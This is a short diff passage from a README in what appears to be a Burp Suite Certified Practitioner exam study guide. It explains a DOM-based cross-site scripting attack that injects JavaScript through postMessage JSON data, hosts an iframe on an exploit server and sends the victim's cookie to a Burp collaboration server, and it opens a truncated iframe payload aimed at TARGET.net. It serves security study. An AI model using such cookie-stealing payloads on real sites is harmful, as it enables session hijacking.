botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/README.md

 ```

 >To exploit the above code, inject JavaScript into the JSON data to change "load-channel" field data and steal document cookie.

->Hosted **iframe** on exploit server html body, to send the victim cookie to the collaboration server.
+>Host an **iframe** on the exploit server html body, and send it to the victim, resulting in the stealing of their cookie.
+The victim cookie is sned to the Burp collaboration server.

 ```html
 <iframe src=https://TARGET.net/ onload='this.contentWindow.postMessage(JSON.stringify({